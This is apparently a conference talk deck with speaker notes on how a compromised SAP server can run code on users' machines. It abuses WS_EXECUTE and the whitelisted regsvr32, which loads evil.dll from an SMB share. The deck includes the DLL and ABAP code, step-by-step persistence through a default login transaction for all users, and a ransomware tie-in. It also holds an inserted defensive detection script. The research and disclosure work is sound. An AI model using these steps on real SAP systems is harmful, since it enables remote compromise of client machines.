Agenda
Most critical vulnerabilities
Demo1
Standard SAP attacker actions
Motivation
DBACockpit transaction
Main research
Calc! Calc! Calc! Calc! Calc! Calc! Calc! Calc! Calc!
Demo2
Bonus video
Most critical vulnerabilities
How to get admin privileges in SAP?
Over 500 companies have a vulnerable CTC servlet (RCE, 2011)
3 Java serialization exploits (RCE without authorization, 2015)
Information disclosure + SQL injection + crypto issue + misconfiguration = RCE (Black Hat 2016)
DoS + DoS + race condition + auth bypass = RCE (Troopers 2016)
Anonymous directory traversal + privilege escalation = RCE (fix still pending)
Minimum impact
To compromise SAP, an attacker needs to find a vulnerability, or a chain of vulnerabilities, that lets them read SecStore.properties and SecStore.key and so obtain an administrator user with SAP_ALL privileges.
Alternatively, to elevate privileges and gain access to the underlying system as the SAP OS user or root.
[Diagram: working schema of SAP users. Several SAP GUI clients connect through the Gateway/Dispatcher to the work processes, which talk to the database.]
[Diagram, step 1 of the evil user: the same schema, with an evil user sending an exploit at the Gateway/Dispatcher.]
[Diagram, step 2 of the evil user: the exploit reaches a work process and, through it, the database.]
[Diagram, step 2 of the evil user (continued): the evil user now controls a work process.]
[Diagram, "That was it…till today": the compromised work process, which until now was the end of the attack.]
Demo 1
SAP GUI: motivation
Goal: attack SAP users from a compromised SAP server.
While running the DBACockpit transaction to manage the database through SAP GUI, we noticed that SAP GUI offers to open the database management program.
After clicking the web browser button, SAP GUI launched the IE browser and opened the URL without any security notification.
Interesting! Maybe we can start any program on the client's computer…
DBACockpit
WTF
Example of a program which runs: calc
Looking for answers in forums
We had 4 ways to disable the security prompt:
• Open some URL with a vulnerable/malicious ActiveX using IE
• Analyze sapfesec.dll, which SAP GUI uses to draw the prompt
• Search for a vulnerability in the whitelist of EXE files
sapfesec.dll
White list? What? regsvr32?
regsvr32
regsvr32.exe [/u] [/n] [/i[:cmdline]] evil.dll
cat evil.dll.c
#include <windows.h>
/* DllInstall is the entry point regsvr32 calls when given /i; the demo body only launches calc */
HRESULT DllInstall(BOOL bInstall, _In_opt_ PCWSTR pszCmdLine)
{
    ShellExecuteA(NULL, "open", "c:\\Windows\\System32\\calc.exe", NULL, NULL, SW_SHOWNORMAL);
    return S_OK;
}
Call regsvr32 from ABAP
" WS_EXECUTE runs a program on the SAP GUI front end; regsvr32 is whitelisted, so no prompt appears
CALL FUNCTION 'WS_EXECUTE'
  EXPORTING
    program     = 'c:\Windows\System32\regsvr32.exe'
    commandline = '/i /s \\SMB_SHARE\tmp\evil.dll'
    inform      = ''
  EXCEPTIONS
    frontend_error     = 1
    no_batch           = 2
    prog_not_found     = 3
    illegal_option     = 4
    gui_refuse_execute = 5
    OTHERS             = 6.
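A defender-side check for the pattern on the two slides above (SAP GUI spawning the whitelisted regsvr32.exe with a DLL on a share), as an added example that is not code from the talk: it runs over constructed process-creation records in a Key="value" format, and the assumption that SAP GUI for Windows runs as saplogon.exe is mine, not the slides'.

```python
"""
Detection for SAP GUI launching the whitelisted regsvr32.exe to install a DLL
served from a share. Added example, not code from the talk. The record format
and the sample events are constructed; the saplogon.exe process name is an
assumption about SAP GUI for Windows that the slides do not state.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Assumption: process name of SAP GUI for Windows (not stated on the slides).
SAP_GUI_PARENTS = {"saplogon.exe"}
# The slide shows regsvr32 on the sapfesec.dll whitelist: it runs without the
# "Do you allow SAP GUI to start ..." prompt, so its launch is worth alerting on.
WHITELISTED_LOLBINS = {"regsvr32.exe"}

_KV = re.compile(r'(\w+)="([^"]*)"')
_UNC = re.compile(r"\\\\[^\\\s]+\\\S+")                              # \\server\share\path
_INSTALL = re.compile(r"(?:^|\s)/i(?::\S*)?(?=\s|$)", re.IGNORECASE)  # /i or /i:cmdline
_SILENT = re.compile(r"(?:^|\s)/s(?=\s|$)", re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    image: str
    parent_image: str
    cmdline: str


@dataclass
class Finding:
    pid: int
    severity: str
    reasons: List[str] = field(default_factory=list)


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed process-creation record of the form Key="value" ..."""
    f = dict(_KV.findall(line))
    return ProcEvent(int(f["Pid"]), f["Image"], f["ParentImage"], f["CommandLine"])


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(ev: ProcEvent) -> Optional[Finding]:
    """Return a Finding when SAP GUI launched a whitelisted binary, else None."""
    if basename(ev.parent_image) not in SAP_GUI_PARENTS:
        return None
    if basename(ev.image) not in WHITELISTED_LOLBINS:
        return None  # e.g. calc.exe: SAP GUI shows its security prompt for these
    finding = Finding(ev.pid, "medium",
                      ["whitelisted regsvr32.exe spawned by SAP GUI without a prompt"])
    if _INSTALL.search(ev.cmdline):
        finding.reasons.append("/i: regsvr32 will call the DLL's DllInstall entry point")
        finding.severity = "high"
    if _UNC.search(ev.cmdline):
        finding.reasons.append("DLL path is a UNC share, as in the talk's SMB_SHARE step")
        finding.severity = "high"
    if _SILENT.search(ev.cmdline):
        finding.reasons.append("/s: regsvr32 suppresses its own dialogs")
    return finding


def scan(lines) -> List[Finding]:
    """Run analyse() over raw records, skipping blank lines."""
    return [f for f in (analyse(parse_event(l)) for l in lines if l.strip()) if f]


# Constructed sample records (not real telemetry); install paths are made up.
SAMPLE_EVENTS = [
    r'Pid="4120" Image="C:\Windows\System32\regsvr32.exe" '
    r'ParentImage="C:\Program Files (x86)\SAP\FrontEnd\SAPgui\saplogon.exe" '
    r'CommandLine="regsvr32.exe /i /s \\SMB_SHARE\tmp\evil.dll"',
    r'Pid="4121" Image="C:\Windows\System32\regsvr32.exe" '
    r'ParentImage="C:\Program Files (x86)\SAP\FrontEnd\SAPgui\saplogon.exe" '
    r'CommandLine="regsvr32.exe C:\Program Files\Vendor\legit.dll"',
    r'Pid="4122" Image="C:\Windows\System32\regsvr32.exe" '
    r'ParentImage="C:\Windows\explorer.exe" '
    r'CommandLine="regsvr32.exe /s C:\Windows\System32\sample.dll"',
    r'Pid="4123" Image="C:\Windows\System32\calc.exe" '
    r'ParentImage="C:\Program Files (x86)\SAP\FrontEnd\SAPgui\saplogon.exe" '
    r'CommandLine="calc.exe"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid {f.pid} [{f.severity}]: " + "; ".join(f.reasons))
```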
Full attack algorithm
• Create a new SAP_ALL user with SAP*
• Create a malicious program
• Developer key? Please help
• Insert, save and activate the malicious program
• Create a custom transaction with SE93
• Connect the custom transaction to the malware program
• Set mlauncher as the default transaction
[Diagram: the SAP server answers the client's request by delivering the malicious DLL, evil.dll.]
Demo 2
SAP JAVA GUI
• Works great on SAP GUI
• What about SAP JAVA GUI?
SAP JAVA GUI: trust levels
• When a client connects to the server for the first time, a trust level for the SAP server should be defined
SAP JAVA GUI: trust levels
• Productive
  • We can execute any program on a client's computer without user interaction
• Untrusted
  • We can't execute a program on a client's computer
  • BUT it is possible to connect a user to another SAP server
SAP JAVA GUI: RCE
• Productive
  • just execute any program via WS_EXECUTE
• Untrusted
  • connect the user to a productive system
  • execute any program via WS_EXECUTE
Demo 3
Solution
SAP security note 2407616
That's it? Nope.
Bonus
One type of malware
Most popular ransomware: CryptoLocker, TorrentLocker, CryptoWall, Fusob (for mobile)
Initial ransom starts at $150 to $2,000 (Cryptomix)
Bonus video
SAP strikes back Your SAP server now counter attacks.
Editor's Notes

  1. Here is our agenda for today. We'll start with a brief review of the most common and critical vulnerabilities in SAP. These vulnerabilities give an opportunity to access and compromise critical business data. Then we'll watch a clip about the chain of vulnerabilities presented a year ago at Troopers 2016 and discuss what exactly an attacker can do when they find and exploit SAP vulnerabilities. In addition, we'll reveal our reasons for conducting this research and watch a clip about exploitation of this vulnerability. And we have a bonus video for you.
  2. Now, let us analyze the vulnerabilities we've managed to find.
  3. One of the most critical vulnerabilities, a remote code execution, was detected in 2011. It allows any unauthorized user to easily execute an OS command via a web browser. Although the vulnerability was detected 6 years ago, it was successfully used by some Asian hackers in 2016. To the present day the Internet is being scanned for this vulnerability. It's also worth mentioning that last year, after we had learnt about the vulnerability, we scanned the Internet as well and found out that the number of companies which hadn't fixed it exceeded 500.
  4. To obtain critical information from SAP, attackers or pentesters need to find a vulnerability in SAP which would give them the contents of the secure store files. The administrator credentials used to access the SAP database are stored in these files. Once application-administrator access to SAP has been obtained, a vulnerability in another component is needed to gain access to the underlying system.
  5. Now it's time to have a look at the common working scheme of SAP. With the help of SAP GUI, users connect to the SAP server and do their work.
  6. Let's consider a situation where an attacker obtains information about SAP, exploits a vulnerability, e.g. in the SAP gateway or SAP disp+work, and accesses the SAP database.
  7. While pentesting, we stopped at the stage of accessing the SAP database, but today we suggest going further.
  8. Here is a demo from the previous Troopers conference.
  9. So, why did we decide to do this research? It's no secret that there are a lot of transactions, functions and applications in SAP which allow managing and monitoring the system and viewing logs.
  10. Once again, we executed the DBACockpit transaction and saw this important database management functionality.
  11. SAP GUI requested from us a path to open the database management program. When we wanted to start it with the web browser button, SAP GUI launched the IE browser and opened the URL without any security notification. So, we decided to create a special ABAP program with which we could execute any program on target computers. By the time the research was finished we had identified the simplest and most common way to start programs on a client's computer, which is the WS_EXECUTE function.
  12. However, when we tried launching the calculator with the help of WS_EXECUTE we got a warning message: "Do you allow SAP GUI to start calc on your computer?" That is not what we actually wanted. So, the next question is: "How to bypass this message?"
  13. We thought, "It's worth searching Google. Perhaps someone has already found out how to turn the message off." Yeap, there was. Actually we found a whole bunch of forum replies about disabling the message by changing the Windows registry. However, none of them was suitable for us, because we just couldn't change registry keys remotely. Moreover, the solution wasn't applicable to newer SAP GUI versions.
  14. Still, there were 4 other ways to solve the problem: open a special URL which would use a vulnerable ActiveX in Internet Explorer; analyse how SAP GUI draws the nag screen with the help of sapfesec.dll; find a vulnerability in the whitelist (we'll speak about this option a bit later); and the 4th one…well, one doesn't even want to consider it…:D However, at the first stage of the research the ActiveX method dropped out. So, we proceeded with the 2nd one.
  15. As mentioned before, the SAP security prompt is rendered by the sapfesec.dll file. Analyzing this file, we learnt that if applications are stored in the SAP GUI directory with certain names, the SAP security prompt won't appear. Thus, we went on researching with this method.
  16. Mhmm…have you noticed that there is a Regsvr32 – file – read, write, execute record in the whitelist? I.e. if this file is called from Windows, SAP GUI will show no alerts and the file will be executed. Nonetheless, regsvr32 is a Windows OS file which is required for stable operation of the system, as well as for installing and managing DLL files.
  17. Regsvr32 is launched with predefined arguments, with the path to a DLL file as a mandatory one. A common DLL responsible for launching calc looks this way: ***It should be checked which of these functions will be the first to finish its work.
  18. It appears that a program written in ABAP and responsible for arbitrary code execution on a target system will have the following form. Here smb_share is a public data storage where our DLL with the malicious code will be put.
  19. Let's consider a hypothetical situation: what would happen if an attacker found the vulnerability.
  20. For starters, to get RCE on a client's computer, it is necessary to create a user with developer rights. The user SAP* cannot create or change any programs. To do this, run transaction SU01 and copy a user; for example, create a new user with SAP_ALL rights under the login EVIL_DEV.
  21. Then log in as the EVIL_DEV user, run transaction SE38 and create a program sap_malware_prog.
  22. If the user with developer rights is a new one, a developer key will be needed, which is not a challenge for an attacker.
  23. No comment.
  24. Then, once we are able to create a program, we click the Insert button, copy in a program which executes the malicious functionality, then save everything and activate the program.
  25. The program is created; now we need to create a custom transaction which will launch the malware itself. For example, we call the transaction MLAUNCHER.
  26. Tie the transaction MLAUNCHER to the malicious program sap_malware_prog and save it.
  27. However, you can go a step further and set a default transaction. When a user logs in, transaction MLAUNCHER will start and the machine will run the malicious code.
  28. The screenshot shows that we set the start transaction MLAUNCHER for all users.
  29. And then, if the user logs in to the SAP system, right after login it will process the MLAUNCHER transaction and, for example, launch a calculator.
  30. Demo video here.
  31. How can information theft from users' computers harm, say, a company with 1000 users?! Of course, by using ransomware.
  32. Protection against ransomware is difficult. Ransomware-as-a-service attacks have been growing more popular since the end of 2016. 1. If you are infected, then infect a friend or friends, and you will be unlocked. 2. If you want to earn money, spread ransomware and get money.
  33. Ransomware is becoming more and more popular, and the number of infected user machines keeps increasing.